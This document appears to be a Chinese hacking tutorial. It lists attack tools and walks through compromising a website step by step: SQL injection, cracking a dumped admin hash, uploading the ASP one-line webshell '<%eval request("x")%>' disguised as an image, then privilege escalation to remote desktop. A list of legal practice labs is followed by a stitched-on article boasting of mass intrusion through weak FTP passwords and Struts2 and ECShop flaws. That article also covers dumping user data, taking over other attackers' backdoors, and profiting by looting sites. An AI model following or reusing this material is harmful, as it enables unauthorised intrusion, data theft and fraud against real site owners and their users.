下面的这些工具在黑客小密圈里面都有，如果加入小密圈了可以直接在哪里下载，如果没有加入，可以在网上找，网上也可以找到的。

　　1、找注入 爆账号

　　啊D和明小子

　　2、注入工具

　　椰树扫描、流光、Pangolin（穿山甲）、havij（胡萝卜）

　　3、找后台

　　御剑后台扫描、wwwscan扫描器

　　4、传小马

　　各种一句话木马、中国菜刀、中国蚁剑

　　5、提权

　　pr提权工具、黑协提权工具

　　接下来就直接渗透一个网站案例，来演示各种工具的使用 *** ：

　　实验环境大家可以用虚拟机或者本地进行模拟操作，或者找些漏洞较多，比较垃圾的网站进行操作。

　　演示开始：

　　步骤一：找注入

　　打开浏览器，推荐用火狐浏览器或谷歌浏览器。

　　出现下图的页面，这里用ie演示。

　　

　　IE浏览器的选项设置，新手建议全部显示反馈的错误信息，根据实际情况来，就可以准确的判断网页的信息。

　　直接用啊D注入工具和明小子配合检测使用

　　

　　

　　成功找到注入点，如下图：

　　

　　步骤二：爆账号

　　右键找到的注入点——注入检测

　　

　　点击右上角的检测开始注入检测

　　

　　

　　

　　最后得到网站的某个账号，用户名：linhai ，密码：d7e15730ef9708c0

　　一般来说，数据库存放的密码应该是经过md5加密过的，不用担心，只需要用解密MD5工具一下就可以解密，百度一下，解密工具很多，这里推荐：

　　解密md5后得到的密码为：linhai19760812

　　步骤三：找后台【可以用御剑后台扫描器扫描】

　　此步骤为找到网站的管理后台。

　　

　　

　　接下来，访问扫描到的后台地址，登录。

　　地址：/admin/login.asp

　　

　　直接登录网站后台，到这里，已经成功获得网站后台管理权限了。

　　步骤四：传小马

　　记住黑客入门教程里面的一句话，先传小马，再传大马，找到上传点就不会错，稳拿下。

　　由于是asp的站点，确定需要的是asp一句话木马，代码为<%eval request("x")%>，密码为x

　　网站后台的上传点可能很多，有的可行，有的不行，可以多试试，我们的目的就是通过这些上传点，把我们的木马上传到网站服务器，从而控制网站。

　　通常成功率比较高的上传点是上传图片附件，如下图：

　　

　　做个木马，打开txt文档，写上asp一句话<%eval request("x")%>，密码是x。并且把文件类型改成图片，不要只写一行代码，不大不小，100行差不多。

　　

　　然后上传。接下来的思路就是利用网站的数据库功能，把我们上传的文件后缀由jpg改成asp。

　　

　　然后，就可以用菜刀，连接刚才复制到根目录的xbk.asp文件（木马）。

　　打开菜刀，在空白处右键——添加，输入木马的地址和网站。

　　

　　

　　步骤五：拿权限

　　接下来主要用提权三件套：cmd.exe、pr.exe、3389.bat ，把这3个工具，用菜刀上传到回收站目录下面。接下来，进入我们上传的cmd.exe虚拟终端，执行我们的提权三件套。

　　

　　

　　不仅仅这种 *** 可以成功，不同的思路可以转变，或许过程会很顺利，也或者防护很多，没办法顺利入侵成功。

　　执行完成后，打开远程桌面，用刚才提权的账号，进入服务器。

　　

　　到此为止，一个完整的渗透过程结束，已经成功获得服务器的管理权限了。

　　练习黑客技术的在线网站

　　

　　1、bWAPP

　　免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。

　　

　　地址：

　　2、Damn Vulnerable iOS App(DVIA)

　　

　　DVIA是一个iOS安全的应用。它的主要目标给移动安全爱好者学习iOS的渗透测试技巧提供一个合法的平台。APP涵盖了所有常见的iOS安全漏洞，它免费并开放源码,漏洞测试和解决方案覆盖到iOS 10版本。

　　地址：

　　3、Damn Vulnerable Web Application (DVWA)

　　

　　基于 php 和 mysql 的虚拟 Web 应用，“内置”常见的 Web 漏洞，如 SQL 注入、xss 之类，可以搭建在自己的电脑上

　　地址：

　　4、Game of Hacks

　　

　　基于游戏的方式来测试你的安全技术，每个任务题目提供了大量的代码,其中可能有也可能没有安全漏洞！

　　地址：

　　5、Google Gruyere

　　

　　一个看起来很low的网址，但充满了漏洞,目的是为了帮助那些刚开始学习应用程序安全性的人员。

　　地址：

　　6、HackThis!

　　

　　旨在教你如何破解、转储和涂改,以及保护网站的黑客技巧，提供超过50种不同的难度水平。

　　地址：

　　7、Hack This Site

　　

　　是一个合法和安全的测试黑客技能的网站，并包含黑客资讯、文章、论坛和教程,旨在帮助你学习黑客技术。

　　地址：

　　8、Hellbound Hackers

　　

　　提供了各种各样的安全实践 *** 和挑战,目的是教你如何识别攻击和代码的补丁建议。主题包含应用程序加密和破解,社工和rooting。社区有接近10万的注册会员,也是更大的一个黑客社区之一。

　　地址：

　　9、McAfee HacMe Sites

　　

　　迈克菲提供的各类黑客及安全测试工具

　　地址：

　　10、Mutillidae

　　

　　mutillidaemutillidae是一个免费，开源的Web应用程序，提供专门被允许的安全测试和入侵的Web应用程序。其中包含了丰富的渗透测试项目，如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等.

　　地址：

　　11、OverTheWire基于游戏的让你学习安全技术和概念的黑客网站

　　

　　地址：

　　=12、Peruggia

　　

　　一个提供安全、合法攻击的黑客网站

　　地址：

　　=13、Root Me

　　

　　通过超过200名黑客的挑战和50个虚拟环境来提高你黑客技巧和 *** 安全知识的网站

　　地址：

　　=14、Try2Hack

　　

　　最古老的黑客网站之一,提供多种安全挑战。

　　地址：

　　=15、Vicnum

　　

　　OWASP项目之一，简单框架,针对不同的需求，并基于游戏的方式来引导安全开发者学习安全技术。

　　地址：

　　=16、WebGoat

　　更受欢迎的OWASP项目，提供了一个真实的安全教学环境，指导用户设计复杂的应用程序安全问题

　　地址：

　　

　　我们生活在互联网时代，重视个人信息及网站数据安全尤为重要，但又有多少互联网从业者真正做到了保护数据及隐私的安全呢。开通网站安全版块为站长们分享网站安全与黑客入侵网站的相关案例，目的提醒站长们注重自己的网站帐号数据和资料安全，尽可能的把网站被黑的风险降到更低。

　　

　　一，胜率

　　初恋结婚的概率为1%，所谓天长地久，不过是一厢情愿。

　　初次创业的成功率在5%左右，所谓雄心壮志，只是廉价炮灰。

　　赌场的胜率只需多占1%，那些聪明智慧运气爆发的赌客，终究只能是输家。

　　勇气、拼搏、努力、挑战自己、大无畏精神… 这些溢美之词，终将成为凡人的噩梦，任他天赋异禀，才华绝伦，也免不了一世悲剧。

　　想要成为最终的赢家，其实也简单。

　　永远站在胜率较高的一方！绝不孤注一掷！挑软柿子捏！

　　积跬步必至千里，积小流终成江海，携大道之力，可破万物。

　　世界上什么东西也替代不了持之以恒，才华不能够，因为不成功的才子到处都是；天赋也不能够，因为这个世界上到处是受过良好教育的乞丐。惟有正确的 *** 和持之以恒才是万能的。

　　万法相通，哥哥已经多年没接触黑客技术，但入侵网站的效率反而更胜从前。

　　二，批量入侵网站

　　无论多么严密的系统和安全措施，终究是人在操控，人才是漏洞的根源。

　　无需任何技术，小学以上文化水平，智力不低于人类平均水平，就能实施黑客攻击。

　　* 弱口令批量入侵

　　

　　做网站时，先要将网站源码上传到服务器。

　　FTP就是上传源码到服务器的软件，因此只要获得网站的FTP密码，这个网站的所有数据就唾手可得。

　　总会有一些网站的密码非常简单，如上图某网站的密码是123456；

　　通过搜索引擎采集大量网址，然后用软件自动扫描，成千上万个网站中，总会有那么几个网站的密码很简单。

　　根据哥哥的测试，此 *** 有0.03%的成功率，1万个网站中有3个是弱密码。

　　黑产可以倒卖这些网站的数据获利，也可以用这些网站发广告赚钱，尤其是博彩行业最喜欢这么干，收获颇丰。

　　* 漏洞批量入侵法

　　哥哥随手搞了下，轻松拿下几百个网站的权限，这其中包括大型集团、商城、 *** 、银行…

　　“struts 2”是个网站应用框架，程序员在struts2框架的基础上能方便快捷的开发出各种网站。但这个框架在2014年~2018年期间，出现8个漏洞，无数大型网站沦陷，堪称黑产圈的狂欢节。

　　虽然是老漏洞了，但必定还有很多网站比较幸运，没有被入侵，就拿这些幸运儿开刀吧。

　　使用“struts 2”框架做的网站，网址通常会包含一个单词“action”。

　　用百度高级指令搜索，inurl:action，意思是搜索所有网址中包含字母“action”的网站。

　　为了提高效率，哥哥用软件批量在百度采集网址，如下图

　　

　　将采集的网址导入“struts 2漏洞软件”，软件能自动批量检测。

　　

　　1%以上的网站存在漏洞，银行、学校、物流系统…无一幸免。

　　下图是某学校网站的测试结果，可以随意查看网站的任何信息，包括服务器的配置、安装了哪些软件、管理员用户名等信息，从图片能看出，这是个Windows系统，管理员的用户名是：administrator 。

　　

　　为了更方便的看到网站的数据，百度搜索“jsp木马”，随便找一段代码上传到这个网站。

　　

　　打开木马，就能管理服务器的所有内容，Windows2012系统，硬盘里有几百G的资料…

　　为了避免被请喝茶，就不深入了，漏洞已经告知这家学校了。

　　

　　接下来，哥哥继续演示利用商城系统的漏洞，批量入侵。

　　

　　ecshop在国内非常主流，大部分商城网站都是用这套系统做的。

　　ecshop漏洞和刚才的struts 2漏洞的操作 *** 一样，先用软件采集全网各大商城的网址，然后用软件批量检测。

　　

　　0.5%的概率能成功，软件会自动生成一个“coon.php”的木马文件，密码是 *** ，用下图的软件就能连接。

　　

　　这个商城的所有源代码和数据，黑客可以随意删除或更改。

　　哥哥顺手打开商城网站的数据库文件，看到数据库用户名和密码。

　　

　　用软件“Navicat”连接这个数据库，找到保存用户信息的数据表… 可以获取商城的所有用户信息，包括邮箱、手机号、用户名…

　　

　　在检测的过程中，无意中进入某公司的服务器，这个服务器上居然有上百个网站…

　　瞬间几百个网站的数据就公开了…

　　

　　其他漏洞的操作 *** 同理，轻而易举就能入侵成千上万个网站。

　　三，黄雀在后

　　聪明的读者肯定会留意到上面的一句话“软件会自动生成一个“coon.php”的木马文件，密码是 *** ”

　　批量入侵留的木马地址和密码都是一样的…

　　所以！根本不需要我们上传木马，只需跟着大佬的脚步，批量扫描网站是否存在木马文件，并用大佬的密码连接。

　　

　　既然ECShop漏洞攻击软件，会生成一个coon.php的木马文件，密码是 *** ，那么我们只需批量采集商城网址，然后用软件扫描是否存在coon.php的文件，这样就能获取其他黑客搞过的网站。

　　这个思路极为逆天！

　　百度搜“被黑网站统计”，有许多小黑客在获得网站的权限后，会上传一个装逼的网页，并提交到黑客网站，满足虚荣心的同时还能给自己做宣传。

　　小黑客们入侵后，留的木马后门通常都一样，因此只需搞定某个黑客入侵的某个网站，一般就能获取他在所有网站留的木马后门。

　　哥哥用此法把某位大佬的所有木马都删了…

　　黑产的变现手法极多，出售用户数据、DDOS攻击、挂广告…这些只是入门级玩法。

　　针对业务型网站实施的攻击，堪称抢劫。

　　入侵点卡网站，用网站余额批量给自己的号充值，然后转手出售，一晚洗劫数十万。

　　入侵竞价网站，偷别人网站的客户。

　　四，大道至简

　　无极领域的文章标题，只要和网赚相关，标题带有日赚xxx元，阅读量通常比其他内容多一倍。

　　项目终会失效，漏洞总会过时，忙碌半世，终免不了一场悲剧。

　　在一秒钟内看到本质的人和花半辈子也看不清一件事本质的人，自然是不一样的命运。